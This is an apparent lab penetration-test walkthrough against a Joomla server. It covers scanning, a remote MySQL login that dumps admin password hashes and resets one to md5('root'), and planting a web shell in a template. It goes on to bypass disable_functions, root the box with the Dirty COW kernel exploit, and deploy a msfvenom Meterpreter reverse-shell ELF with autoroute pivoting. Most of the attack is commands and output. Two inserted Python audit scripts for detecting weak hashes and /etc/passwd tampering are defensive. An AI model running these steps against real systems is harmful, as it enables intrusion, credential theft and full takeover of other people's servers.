    LICENSE file found      > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xml
    Explorable Directory    > http://192.168.1.21/components/com_actionlogs/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin       > http://192.168.1.21/index.php?option=com_admin
    On the administrator components
    LICENSE file found      > http://192.168.1.21/administrator/components/com_admin/admin.xml
    Explorable Directory    > http://192.168.1.21/components/com_admin/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax        > http://192.168.1.21/index.php?option=com_ajax
    But possibly it is not active or protected
    LICENSE file found      > http://192.168.1.21/administrator/components/com_ajax/ajax.xml
    Explorable Directory    > http://192.168.1.21/components/com_ajax/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners     > http://192.168.1.21/index.php?option=com_banners
    But possibly it is not active or protected
    LICENSE file found      > http://192.168.1.21/administrator/components/com_banners/banners.xml
    Explorable Directory    > http://192.168.1.21/components/com_banners/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config      > http://192.168.1.21/index.php?option=com_config
Component found: com_contact     > http://192.168.1.21/index.php?option=com_contact
    LICENSE file found      > http://192.168.1.21/administrator/components/com_contact/contact.xml
    LICENSE file found      > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content     > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory      > http://192.168.1.21/index.php?option=com_contenthistory
    But possibly it is not active or protected
    Explorable Directory    > http://192.168.1.21/components/com_config/
    Explorable Directory    > http://192.168.1.21/components/com_contact/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_config/
    LICENSE file found      > http://192.168.1.21/administrator/components/com_content/content.xml
    LICENSE file found      > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xml
    Explorable Directory    > http://192.168.1.21/administrator/components/com_contact/
    Explorable Directory    > http://192.168.1.21/components/com_contenthistory/
    Explorable Directory    > http://192.168.1.21/components/com_content/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_contenthistory/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields      > http://192.168.1.21/index.php?option=com_fields
    But possibly it is not active or protected
    LICENSE file found      > http://192.168.1.21/administrator/components/com_fields/fields.xml
    Explorable Directory    > http://192.168.1.21/components/com_fields/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer   > http://192.168.1.21/index.php?option=com_installer
    On the administrator components
    LICENSE file found      > http://192.168.1.21/administrator/components/com_installer/installer.xml
    Explorable Directory    > http://192.168.1.21/components/com_installer/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate        > http://192.168.1.21/index.php?option=com_joomlaupdate
    On the administrator components
    LICENSE file found      > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xml
    Explorable Directory    > http://192.168.1.21/components/com_joomlaupdate/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto      > http://192.168.1.21/index.php?option=com_mailto
    But possibly it is not active or protected
    LICENSE file found      > http://192.168.1.21/components/com_mailto/mailto.xml
    Explorable Directory    > http://192.168.1.21/components/com_mailto/
Component found: com_media       > http://192.168.1.21/index.php?option=com_media
    But possibly it is not active or protected
    LICENSE file found      > http://192.168.1.21/administrator/components/com_media/media.xml
    Explorable Directory    > http://192.168.1.21/components/com_media/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds   > http://192.168.1.21/index.php?option=com_newsfeeds
    LICENSE file found      > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xml
    Explorable Directory    > http://192.168.1.21/components/com_newsfeeds/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search      > http://192.168.1.21/index.php?option=com_search
    LICENSE file found      > http://192.168.1.21/administrator/components/com_search/search.xml
    Explorable Directory    > http://192.168.1.21/components/com_search/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_search/
Component found: com_users       > http://192.168.1.21/index.php?option=com_users
    LICENSE file found      > http://192.168.1.21/administrator/components/com_users/users.xml
    Explorable Directory    > http://192.168.1.21/components/com_users/
    Explorable Directory    > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper     > http://192.168.1.21/index.php?option=com_wrapper
    LICENSE file found      > http://192.168.1.21/components/com_wrapper/wrapper.xml
    Explorable Directory    > http://192.168.1.21/components/com_wrapper/
End Scanner

6. joomscan Perl script

perl joomscan.pl -u 192.168.1.21

    (1337.today)
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.1.21 ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
http://192.168.1.21/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.1.21/robots.txt

Interesting path found from robots.txt
http://192.168.1.21/joomla/administrator/
http://192.168.1.21/administrator/
http://192.168.1.21/bin/
http://192.168.1.21/cache/
http://192.168.1.21/cli/
http://192.168.1.21/components/
http://192.168.1.21/includes/
http://192.168.1.21/installation/
http://192.168.1.21/language/
http://192.168.1.21/layouts/
http://192.168.1.21/libraries/
http://192.168.1.21/logs/
http://192.168.1.21/modules/
http://192.168.1.21/plugins/
http://192.168.1.21/tmp/

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.1.21/configuration.php~

Your Report : reports/192.168.1.21/

That route looks like a dead end, so the only option left is to log in remotely to the target's MySQL.

MySQL

1. Remote login

┌──(root㉿ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.001 sec)

2. Looking for sensitive data

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
| am2zu_assets                  |
| am2zu_associations            |
| am2zu_banner_clients          |
| am2zu_banner_tracks           |
| am2zu_banners                 |
| am2zu_categories              |
| am2zu_contact_details         |
| am2zu_content                 |
| am2zu_content_frontpage       |
| am2zu_content_rating          |
| am2zu_content_types           |
| am2zu_contentitem_tag_map     |
| am2zu_core_log_searches       |
| am2zu_extensions              |
| am2zu_fields                  |
| am2zu_fields_categories       |
| am2zu_fields_groups           |
| am2zu_fields_values           |
| am2zu_finder_filters          |
| am2zu_finder_links            |
| am2zu_finder_links_terms0     |
| am2zu_finder_links_terms1     |
| am2zu_finder_links_terms2     |
| am2zu_finder_links_terms3     |
| am2zu_finder_links_terms4     |
| am2zu_finder_links_terms5     |
| am2zu_finder_links_terms6     |
| am2zu_finder_links_terms7     |
| am2zu_finder_links_terms8     |
| am2zu_finder_links_terms9     |
| am2zu_finder_links_termsa     |
| am2zu_finder_links_termsb     |
| am2zu_finder_links_termsc     |
| am2zu_finder_links_termsd     |
| am2zu_finder_links_termse     |
| am2zu_finder_links_termsf     |
| am2zu_finder_taxonomy         |
| am2zu_finder_taxonomy_map     |
| am2zu_finder_terms            |
| am2zu_finder_terms_common     |
| am2zu_finder_tokens           |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types            |
| am2zu_languages               |
| am2zu_menu                    |
| am2zu_menu_types              |
| am2zu_messages                |
| am2zu_messages_cfg            |
| am2zu_modules                 |
| am2zu_modules_menu            |
| am2zu_newsfeeds               |
| am2zu_overrider               |
| am2zu_postinstall_messages    |
| am2zu_privacy_consents        |
| am2zu_privacy_requests        |
| am2zu_redirect_links          |
| am2zu_schemas                 |
| am2zu_session                 |
| am2zu_tags                    |
| am2zu_template_styles         |
| am2zu_ucm_base                |
| am2zu_ucm_content             |
| am2zu_ucm_history             |
| am2zu_update_sites            |
| am2zu_update_sites_extensions |
| am2zu_updates                 |
| am2zu_user_keys               |
| am2zu_user_notes              |
| am2zu_user_profiles           |
| am2zu_user_usergroup_map      |
| am2zu_usergroups              |
| am2zu_users                   |
| am2zu_utf8_conversion         |
| am2zu_viewlevels              |
| umnbt_action_log_config       |
| umnbt_action_logs             |
| umnbt_action_logs_extensions  |
| umnbt_action_logs_users       |
| umnbt_assets                  |
| umnbt_associations            |
| umnbt_banner_clients          |
| umnbt_banner_tracks           |
| umnbt_banners                 |
| umnbt_categories              |
| umnbt_contact_details         |
| umnbt_content                 |
| umnbt_content_frontpage       |
| umnbt_content_rating          |
| umnbt_content_types           |
| umnbt_contentitem_tag_map     |
| umnbt_core_log_searches       |
| umnbt_extensions              |
| umnbt_fields                  |
| umnbt_fields_categories       |
| umnbt_fields_groups           |
| umnbt_fields_values           |
| umnbt_finder_filters          |
| umnbt_finder_links            |
| umnbt_finder_links_terms0     |
| umnbt_finder_links_terms1     |
| umnbt_finder_links_terms2     |
| umnbt_finder_links_terms3     |
| umnbt_finder_links_terms4     |
| umnbt_finder_links_terms5     |
| umnbt_finder_links_terms6     |
| umnbt_finder_links_terms7     |
| umnbt_finder_links_terms8     |
| umnbt_finder_links_terms9     |
| umnbt_finder_links_termsa     |
| umnbt_finder_links_termsb     |
| umnbt_finder_links_termsc     |
| umnbt_finder_links_termsd     |
| umnbt_finder_links_termse     |
| umnbt_finder_links_termsf     |
| umnbt_finder_taxonomy         |
| umnbt_finder_taxonomy_map     |
| umnbt_finder_terms            |
| umnbt_finder_terms_common     |
| umnbt_finder_tokens           |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types            |
| umnbt_languages               |
| umnbt_menu                    |
| umnbt_menu_types              |
| umnbt_messages                |
| umnbt_messages_cfg            |
| umnbt_modules                 |
| umnbt_modules_menu            |
| umnbt_newsfeeds               |
| umnbt_overrider               |
| umnbt_postinstall_messages    |
| umnbt_privacy_consents        |
| umnbt_privacy_requests        |
| umnbt_redirect_links          |
| umnbt_schemas                 |
| umnbt_session                 |
| umnbt_tags                    |
| umnbt_template_styles         |
| umnbt_ucm_base                |
| umnbt_ucm_content             |
| umnbt_ucm_history             |
| umnbt_update_sites            |
| umnbt_update_sites_extensions |
| umnbt_updates                 |
| umnbt_user_keys               |
| umnbt_user_notes              |
| umnbt_user_profiles           |
| umnbt_user_usergroup_map      |
| umnbt_usergroups              |
| umnbt_users                   |
| umnbt_utf8_conversion         |
| umnbt_viewlevels              |
+-------------------------------+
156 rows in set (0.001 sec)

MySQL [joomla]>

MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password                                                     |
+----------+------+--------------------------------------------------------------+
| admin    | :    | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username      | 0x3a | password                                                     |
+---------------+------+--------------------------------------------------------------+
| administrator | :    | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

Change the password with a MySQL statement:

update am2zu_users set password = md5("root") where id = 891;



Both accounts carry a "Super User" label, so they very likely hold the highest privileges. We reset the administrator account's password to root; the stored value must of course be the MD5 hash of root, not the plaintext.
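The reset works because Joomla's verifier still accepts plain or salted MD5 hashes next to bcrypt, so from the defender's side any non-bcrypt hash in the users table is worth flagging. The audit script below is an added example for this write-up, not code from the original post or from Joomla; the sample rows are constructed (the two bcrypt values are the ones shown above, the MD5 rows are made up), and the prefix order in classify_hash follows Joomla 3's verifyPassword as I recall it, which is an assumption.

```python
"""Audit Joomla user rows for password hashes that are not bcrypt.

Added example for this write-up, not code from the original post or from
Joomla.  The walkthrough resets the administrator password with
`update am2zu_users set password = md5("root") where id = 891` and logs in,
which works because Joomla 3 still verifies legacy plain or salted MD5
("digest:salt") hashes alongside bcrypt ("$2y$").  For a defender that means
any users-table hash that is not bcrypt is a finding: either a never-migrated
legacy account or, as here, a direct database edit.
"""
import hashlib
import hmac
import re

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample rows shaped like am2zu_users / umnbt_users.  The two
# bcrypt values are the ones shown in the write-up; the other two rows are
# made up: a plain md5("root") (what the UPDATE above stores) and a legacy
# salted hash md5("password" + "abc") with its salt appended.
SAMPLE_USERS = [
    {"table": "am2zu_users", "id": 891, "username": "administrator",
     "password": "$2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy"},
    {"table": "umnbt_users", "id": 1, "username": "admin",
     "password": "$2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy"},
    {"table": "am2zu_users", "id": 892, "username": "helpdesk",
     "password": "63a9f0ea7bb98050796b649e85481845"},
    {"table": "am2zu_users", "id": 893, "username": "editor",
     "password": hashlib.md5(b"password" + b"abc").hexdigest() + ":abc"},
]


def classify_hash(stored: str) -> str:
    """Name the hash family Joomla's verifier would route this value to.

    Assumption: the prefix order (bcrypt, phpass, SHA-256, then the legacy
    "md5" / "md5:salt" fallback) mirrors Joomla 3's UserHelper::verifyPassword.
    """
    if stored.startswith("$2y$"):
        return "bcrypt"
    if stored.startswith("$P$"):
        return "phpass"
    if stored.startswith("{SHA256}"):
        return "sha256"
    digest, _, salt = stored.partition(":")
    if MD5_HEX.match(digest):
        return "md5-salted" if salt else "md5"
    return "unknown"


def legacy_md5_matches(stored: str, candidate: str) -> bool:
    """Legacy verification: md5(candidate + salt) against the stored digest."""
    digest, _, salt = stored.partition(":")
    test = hashlib.md5((candidate + salt).encode()).hexdigest()
    return hmac.compare_digest(digest, test)


def audit_users(rows, weak_candidates=("root", "admin", "password", "123456")):
    """Return one finding per row whose hash is not bcrypt.

    Legacy MD5 rows are additionally checked against a handful of trivial
    passwords, which is how the reset value "root" from the write-up shows up.
    """
    findings = []
    for row in rows:
        kind = classify_hash(row["password"])
        if kind == "bcrypt":
            continue
        finding = {"table": row["table"], "id": row["id"],
                   "username": row["username"], "hash_type": kind,
                   "weak_password": None}
        if kind in ("md5", "md5-salted"):
            for cand in weak_candidates:
                if legacy_md5_matches(row["password"], cand):
                    finding["weak_password"] = cand
                    break
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_users(SAMPLE_USERS):
        extra = f" (matches weak password '{f['weak_password']}')" if f["weak_password"] else ""
        print(f"{f['table']}#{f['id']} {f['username']}: {f['hash_type']}{extra}")
```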

Logging in to the back end

1. Successful login

We logged in to both back ends, each time with the administrator user.

2. RCE vulnerability

https://www.cnblogs.com/starci/p/15174896.html

Click "Options" and change the "Path to Files Folder" to the current directory "./".
After that, every folder and file under the web root can be browsed and managed from here, which amounts to directory traversal.

At this point command execution could be obtained by editing a file; instead we try a different approach.

AntSword connection

1. Writing the shell

According to the material we collected, the default execution path is http://localhost/templates/beez3/*.php, so we only need to write the web shell into a file there.

That is the path; we insert the shell into one of the PHP files that already exist in the back end.

GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCE: https://github.com/HoangKien1020/CVE-2021-23132

The test succeeded, so the shell can now be written.



2. Bypassing disable_functions

Running commands from AntSword did not work; on inspection, a lot of functions turned out to be disabled, so a bypass is needed. Suitable exploits can be found on GitHub, or AntSword's disable_functions bypass plugin can be used.

GitHub - l3m0n/Bypass_Disable_functions_Shell: a shell that bypasses disable_functions in various ways to reach command execution: https://github.com/l3m0n/Bypass_Disable_functions_Shell

Both options can be tried.




(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44095    ESTABLISHED -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44093    TIME_WAIT   -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44094    TIME_WAIT   -

The IP we see is 192.168.93.120 rather than 192.168.1.21, which means a reverse proxy is in front of this web server and forwards our traffic to 192.168.93.120. Now we need to take over the externally facing host: 192.168.93.100 is the host that forwards the external traffic.


In the tmp directory we found a test.txt file that gave us an account and its password:

adduser wwwuser
passwd wwwuser_123Aqx

SSH connection

┌──(root㉿ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct  6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) 组=500(wwwuser) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$

[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$

Reproducing the Dirty COW privilege escalation and getting a fully interactive shell - 先知社区: https://xz.aliyun.com/t/9757

After some exploration we found that the host allows a kernel privilege escalation: its kernel version lies within the range affected by the Dirty COW vulnerability.

Privilege escalation

┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080                                
[Sat Dec  2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started

[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15--  http://192.168.1.20:8080/dirty.c
正在连接 192.168.1.20:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-c]
正在保存至: “dirty.c”

100%[======================================>] 4,815       --.-K/s   in 0s

2019-10-07 10:12:15 (21.0 MB/s) - 已保存 “dirty.c” [4815/4815])

[wwwuser@localhost tmp]$ ls
dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$

[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:  (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash
mmap: 7f18ff557000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$

┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password: 
Last login: Sun Oct  6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]# 

This concludes the external foothold: Dirty COW gave us root. The next step is lateral movement into the internal network.
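The exploit left two artefacts that a defender can check for without knowing anything about Dirty COW: a second UID-0 account, and a password hash stored directly in /etc/passwd instead of /etc/shadow, plus a backup at /tmp/passwd.bak to diff against. The audit script below is an added example for this write-up, not part of the original post or of dirty.c; the passwd contents are constructed sample files, with only the firefart line taken from the output above.

```python
"""Spot the /etc/passwd tampering that the Dirty COW step above leaves behind.

Added example for this write-up, not part of the original post or of dirty.c.
The exploit run above rewrote /etc/passwd and printed the line it inserted:
`firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash`.  Two things about that
line are detectable without any exploit knowledge: a UID-0 account that is
not root, and a password hash stored in passwd instead of /etc/shadow.
Comparing against a known-good copy (here, the exploit's own /tmp/passwd.bak)
adds the added/removed-account view.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample files (trimmed, CentOS 6 style).  The tampered copy
# carries the firefart line from the write-up in place of the root entry; the
# real exploit's exact edit is not claimed here, and the checks below flag
# either a replaced or an added UID-0 entry.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
"""

TAMPERED_PASSWD = """\
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
"""

Finding = Tuple[str, str]          # (check name, detail)
SHADOWED = {"x", "*", "!", "!!"}   # passwd values meaning "look in /etc/shadow"


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd(5) lines; malformed lines come back with a 'malformed' key."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"name": line, "malformed": "1", "line": str(lineno)})
            continue
        entry = dict(zip(("name", "pw", "uid", "gid", "gecos", "home", "shell"), fields))
        entry["line"] = str(lineno)
        entries.append(entry)
    return entries


def audit_passwd(text: str, baseline: Optional[str] = None) -> List[Finding]:
    """Return findings for a passwd file, optionally diffed against a baseline."""
    findings: List[Finding] = []
    entries = parse_passwd(text)
    good = [e for e in entries if "malformed" not in e]

    for e in entries:
        if "malformed" in e:
            findings.append(("malformed-line", f"line {e['line']}: {e['name']}"))

    # Check 1: the only UID-0 account should be root, and root must exist.
    uid0 = [e for e in good if e["uid"] == "0"]
    if not any(e["name"] == "root" for e in uid0):
        findings.append(("root-missing", "no entry named root with uid 0"))
    for e in uid0:
        if e["name"] != "root":
            findings.append(("extra-uid0", f"{e['name']} (line {e['line']})"))

    # Check 2: with shadow passwords in use, passwd holds no real hash and
    # no empty (passwordless) field.
    for e in good:
        if e["pw"] == "":
            findings.append(("empty-password", e["name"]))
        elif e["pw"] not in SHADOWED:
            findings.append(("hash-in-passwd", e["name"]))

    # Check 3: account set against a known-good copy such as /tmp/passwd.bak.
    if baseline is not None:
        base_names = {e["name"] for e in parse_passwd(baseline) if "malformed" not in e}
        now_names = {e["name"] for e in good}
        for name in sorted(now_names - base_names):
            findings.append(("added", name))
        for name in sorted(base_names - now_names):
            findings.append(("removed", name))
    return findings


if __name__ == "__main__":
    for check, detail in audit_passwd(TAMPERED_PASSWD, BASELINE_PASSWD):
        print(f"[{check}] {detail}")
```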

Internal network penetration

Lateral movement 1

1. Generating the payload file

msfvenom -p linux/x64/meterpreter/reverse_tcp lhosts=192.168.1.25 lport=1111 SessionCommunication Timeout=0 SessionExpiration Timeout=0 -f elf -o shell.elf

msfvenom is used here to generate a Meterpreter reverse shell for 64-bit Linux.
The generated payload connects back to the listener at IP address 192.168.1.25, port 1111.
Both the session communication timeout and the session expiration timeout are set to 0, so the session stays alive until it is explicitly terminated.

-p : specifies the payload
lhosts=192.168.1.25 lport=1111 : specifies the listening host and port
SessionCommunication Timeout=0 : sets the session communication timeout to 0
SessionExpiration Timeout=0 : sets the session expiration timeout to 0
-f elf : specifies the output file type
-o shell.elf : specifies the output file name shell.elf

2. Starting the listener

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06--  http://192.168.1.25/shell.elf
正在连接 192.168.1.25:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”

100%[======================================>] 250         --.-K/s   in 0s

2019-10-07 11:03:06 (46.8 MB/s) - 已保存 “shell.elf” [250/250])

[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elf

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800

meterpreter > getuid
Server username: firefart

3. Adding the internal route

Check which subnets the compromised host can reach:

meterpreter > run get_local_subnets   // list the local subnet ranges
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0

meterpreter > run autoroute -s 192.168.93.0/24  // add a route to the internal network
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routes

meterpreter > run autoroute -p  // show the current meterpreter routing table
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.93.0       255.255.255.0      Session 1

Lateral movement 2

1. Setting up the listener

use exploit/multi/script/web_delivery
......
msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
